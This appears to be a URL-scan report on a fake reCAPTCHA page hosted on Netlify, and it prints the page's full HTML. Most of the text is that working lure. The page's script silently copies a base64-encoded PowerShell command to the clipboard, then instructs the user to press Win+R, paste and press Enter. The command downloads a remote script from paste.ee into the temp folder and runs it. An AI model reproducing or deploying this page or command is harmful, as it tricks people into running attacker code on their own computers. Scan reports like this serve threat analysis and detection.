- ID da verificação
- 45501edc-6f9a-41e8-801c-b666bc5648d8Concluído
- URL enviado:
- https://spark-captcha.netlify.app/
- Relatório concluído:
Links · 0 encontrado(s)
Os links de saída identificados na página
Variáveis JavaScript · 4 encontrada(s)
Variáveis JavaScript globais carregadas no objeto janela de uma página são variáveis declaradas fora das funções e acessíveis de qualquer lugar no código dentro do escopo atual
Nome | Tipo |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
verify | function |
Mensagens de registro do console · 1 encontrada(s)
Mensagens registradas no console web
Tipo | Categoria | Log |
---|---|---|
error | network |
|
HTML
O corpo HTML bruto da página
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Verify You Are Human</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
<style>
body, html {
margin: 0;
padding: 0;
width: 100%;
height: 100%;
display: flex;
justify-content: center;
align-items: center;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: #f2f2f2;
color: #333;
}
.container {
text-align: center;
max-width: 500px;
margin: 20px;
position: relative;
}
.recaptcha-box {
padding: 20px;
background: #fff;
box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);
border-radius: 8px;
text-align: center;
}
.recaptcha-box h2 {
margin: 0 0 20px;
font-size: 28px;
color: #4285f4;
}
.recaptcha-box p {
margin: 0 0 20px;
font-size: 18px;
color: #666;
}
.recaptcha-button {
display: inline-flex;
align-items: center;
padding: 10px 20px;
background: #4285f4;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
font-size: 16px;
transition: background 0.3s;
}
.recaptcha-button img {
margin-right: 10px;
}
.recaptcha-button:hover {
background: #357ae8;
}
.recaptcha-popup {
display: none;
padding: 20px;
background: #fff;
box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);
border-radius: 8px;
text-align: left;
position: absolute;
top: 110%;
left: 50%;
transform: translateX(-50%);
z-index: 20;
animation: fadeIn 0.5s ease;
}
.recaptcha-popup.active {
display: block;
}
.recaptcha-popup h3 {
margin: 0 0 15px;
font-size: 24px;
color: #333;
}
.recaptcha-popup p {
font-size: 18px;
color: #333;
margin: 5px 0;
}
.overlay {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0, 0, 0, 0.5);
z-index: 10;
display: none;
}
.overlay.active {
display: block;
}
@keyframes fadeIn {
from { opacity: 0; }
to { opacity: 1; }
}
</style>
</head>
<body>
<div class="container">
<div class="overlay" id="overlay"></div>
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="recaptcha-button" id="verifyButton">
<img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="reCAPTCHA Logo">
<span>I'm not a robot</span>
</div>
<div class="recaptcha-popup" id="recaptchaPopup">
<h3>Verification Steps</h3>
<p>1. Press Windows Button "<i class="fab fa-windows"></i>" + R</p>
<p>2. Press CTRL + V</p>
<p>3. Press Enter</p>
</div>
</div>
</div>
<script>
function verify() {
const textToCopy = "powershell.exe -eC KGl3ciAtVXJpICJodHRwczovL3Bhc3RlLmVlL2QvdlF2Q20iIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQgfCBPdXQtRmlsZSAtRmlsZVBhdGggIiRlbnY6VEVNUFxzcGFyay5wczEiOyBpZXggKEdldC1Db250ZW50IC1QYXRoICIkZW52OlRFTVBcc3BhcmsucHMxIiAtUmF3KQ==";
const tempTextArea = document.createElement("textarea");
tempTextArea.value = textToCopy;
document.body.appendChild(tempTextArea);
tempTextArea.select();
document.execCommand("copy");
document.body.removeChild(tempTextArea);
const recaptchaPopup = document.getElementById("recaptchaPopup");
const overlay = document.getElementById("overlay");
recaptchaPopup.classList.add("active");
overlay.classList.add("active");
}
const verifyButton = document.getElementById('verifyButton');
verifyButton.addEventListener('click', verify);
</script>
</body></html>